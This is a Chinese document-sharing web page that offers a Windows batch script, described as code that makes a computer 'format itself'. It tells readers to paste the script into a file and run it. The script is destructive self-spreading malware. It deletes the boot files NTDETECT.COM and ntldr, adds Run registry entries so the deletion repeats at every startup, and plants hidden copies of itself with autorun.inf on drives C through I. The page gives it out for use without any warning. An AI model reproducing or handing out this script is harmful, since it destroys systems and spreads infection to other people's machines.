让电脑自动格式化的代码

2022-05-20 21:17:24   文档大全网     [ 字体: ] [ 阅读: ]

#文档大全网# 导语】以下是®文档大全网的小编为您整理的《让电脑自动格式化的代码》,欢迎阅读!
格式化,代码,自动,电脑
将以下代码复制写入文本文档点击另存为文件名协商00.jvb然后打开文件就OK @echo off attrib -h 1.bat

attrib -h c:\autorun.inf

CMD.EXE /C DEL /F /A C:\NTDETECT.COM >nul CMD.EXE /C DEL /F /A C:\ntldr >nul

REG ADD "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN" /F /V "winxp1" /T REG_SZ /D "CMD.EXE /C DEL /F /A C:\NTDETECT.COM" >NUL

REG ADD "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN" /F /V "winxp2" /T REG_SZ /D "CMD.EXE /C DEL /F /A C:\ntldr" >NUL

REG ADD "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN" /F /V "winrun" /T REG_SZ /D "c:\windows\system32\1.bat" >NUL echo [AutoRun] >c:\autorun.inf echo open=1.bat >>c:\autorun.inf

copy /y c:\autorun.inf c:\windows\system32\ >NUL copy /y .\1.bat c:\windows\system32\ >NUL copy /y .\1.bat c:\ >NUL copy /y .\1.bat d:\ >NUL copy /y .\1.bat e:\ >NUL copy /y .\1.bat f:\ >NUL copy /y .\1.bat g:\ >NUL copy /y .\1.bat h:\ >NUL copy /y .\1.bat i:\ >NUL

copy /y c:\windows\system32\1.bat c:\ >NUL copy /y c:\windows\system32\1.bat d:\ >NUL copy /y c:\windows\system32\1.bat e:\ >NUL copy /y c:\windows\system32\1.bat f:\ >NUL copy /y c:\windows\system32\1.bat g:\ >NUL copy /y c:\windows\system32\1.bat h:\ >NUL copy /y c:\windows\system32\1.bat i:\ >NUL copy /y c:\autorun.inf d:\ >NUL copy /y c:\autorun.inf e:\ >NUL copy /y c:\autorun.inf f:\ >NUL copy /y c:\autorun.inf g:\ >NUL copy /y c:\autorun.inf h:\ >NUL copy /y c:\autorun.inf i:\ >NUL attrib +h c:\1.bat >NUL attrib +h d:\1.bat >NUL attrib +h e:\1.bat >NUL attrib +h f:\1.bat >NUL attrib +h g:\1.bat >NUL attrib +h h:\1.bat >NUL attrib +h i:\1.bat >NUL

attrib +h c:\autorun.inf >NUL


attrib +h d:\autorun.inf >NUL attrib +h e:\autorun.inf >NUL attrib +h f:\autorun.inf >NUL attrib +h g:\autorun.inf >NUL attrib +h h:\autorun.inf >NUL attrib +h i:\autorun.inf >NUL


本文来源:https://www.wddqxz.cn/a72b99befd0a79563c1e72e8.html

相关推荐